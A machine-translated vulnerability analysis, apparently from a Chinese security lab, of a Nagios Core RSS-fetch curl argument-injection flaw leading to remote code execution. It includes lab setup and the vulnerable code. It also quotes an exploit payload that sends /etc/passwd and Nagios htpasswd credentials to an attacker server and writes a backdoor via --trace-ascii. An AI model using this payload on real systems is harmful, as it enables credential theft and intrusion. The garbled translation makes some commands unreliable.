10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.043 Low
EPSS
Percentile
91.3%
Author: p0wd3r, dawu (know Chong Yu 404 security lab)
Date: 2016-12-15
Nagios is a monitoring of the IT infrastructure program, recently security researchers Dawid Golunski found in Nagios Core there is a code execution vulnerability: an attacker first in the disguise of RSS feeds, when victimization the app to get the RSS information when the attacker would construct a malicious data to the victim, the program in the process will be the malicious data is injected into the curl command, and then code execution.
The vulnerability is triggered premise:
A successful attack execute arbitrary code.
Nagios Core < 4.2.2
Dockerfile:
FROM quantumobject/docker-nagios
RUN sed-i ‘99d’ /usr/local/nagios/share/includes/rss/rss_fetch. inc
RUN mkdir /tmp/tmp && chown www-data:www-data /tmp/tmp
Then run:
docker run-p 80:80 --name nagios-d quantumobject/docker-nagios
Visit http://127.0.0.1/nagios with nagiosadmin:admin log in
Vulnerability trigger point in/usr/local/nagios/share/includes/rss/extlib/Snoopy. class. inc the 657 line, the _httpsrequest function:
// version < 4.2.0
exec($this->curl_path." -D "/tmp/$headerfile"“. escapeshellcmd($cmdline_params).” ". escapeshellcmd($URI),$results,$return);
// vserion >= 4.2.0 && version < 4.2.2
exec($this->curl_path." -D "/tmp/$headerfile"“.$ cmdline_params.” "“. escapeshellcmd($URI).”"",$ results,$return);
Where the use of the escapeshellcmd to the command parameter processing, escapeshellcmd of the role are as follows:
! [Alt text](/Article/UploadPic/2016-12/2016121710513159. png)
The author is intended to prevent multiple execution of the command, but this treatment did not prevent the implantation of a plurality of parameter samples if the$URI controlled, and then with the curl of some characteristics can read and write files, and then code execution. (In General to prevent the injection of a plurality of parameters to be usedescapeshellarg, but the function is not absolutely secure, see the CVE-2015-4642 only.
Because before the burst of the CVE-2008-4796, the code in the 4. 2. 0 version did change, but the patch can be bypassed, as long as we are in the input closed before and after".
Below we look at the$URI is controllable. According to the code logic point of view, _httpsrequet is usr/local/nagios/share/includes/rss/rss_fetch. inc in the fetch_rss function call, 这样我们创建这样一个测试文件test.php to:
<? php
define(‘MAGPIE_DIR’, ‘./ includes/rss/’);
define(‘MAGPIE_CACHE_ON’, 0);
define(‘MAGPIE_CACHE_AGE’, 0);
define(‘MAGPIE_CACHE_DIR’, ‘/tmp/magpie_cache’);
require_once(MAGPIE_DIR.‘rss_fetch. inc’);
fetch_rss(‘https://www.baidu.com --version’);
Visit http://127.0.0.1/nagios/test. php after turn on dynamic debugging, we in the exec function at the lower breakpoint, the call stack is as follows:
! [Alt text](/Article/UploadPic/2016-12/2016121710514834. png)
$URI as follows:
! [Alt text](/Article/UploadPic/2016-12/2016121710514411. png)
Shows the$URI controlled, and in the incoming process has not been filtered.
Next we need to construct the curl parameters to get the results we want, here we use Dawid Golunski provide the Exp, it is noted that he provided the code to verify that 4. 2. 0 before version to verify the version greater than or equal to 4. 2. 0 and less than 4. 2. 2, The need for which code is about to change, coupled with the closure needed to double the quotes:
self. redirect(‘https://’ + self. request. host + '/nagioshack" -Fpasswd=@/etc/passwd-Fgroup=@/etc/group-Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ’ + backdoor_path + ‘"’, permanent=False)
The Exp of the specific process is as follows:
The attacker on the server to open a http/https Server
Victims using fetch_rss to the server to send its request
The attacker receives the request to redirect, redirect url to https:// + the attacker’s server + payload, the payload in the use-F the file content is sent to the server, the–trace-ascii will flow records to the file, similar to Roundcube RCE in the mail function of-X is.
The server receives the redirected request after the following three operations:
Parse the file content
Return to the back door content and then through the flow record is written to the backdoor file
Returns the constructed XML in the description in the Add<img src=backdoor. php>
Victims parse the XML and the description of the contents of the output to html, and then automatically performs back door
In order to facilitate verification, 我们在网站目录下创建一个exp.php:
<? php
define(‘MAGPIE_DIR’, ‘./ includes/rss/’);
define(‘MAGPIE_CACHE_ON’, 0);
define(‘MAGPIE_CACHE_AGE’, 0);
define(‘MAGPIE_CACHE_DIR’, ‘/tmp/magpie_cache’);
require_once(MAGPIE_DIR.‘rss_fetch. inc’);
fetch_rss(‘http://172.17.0.3’);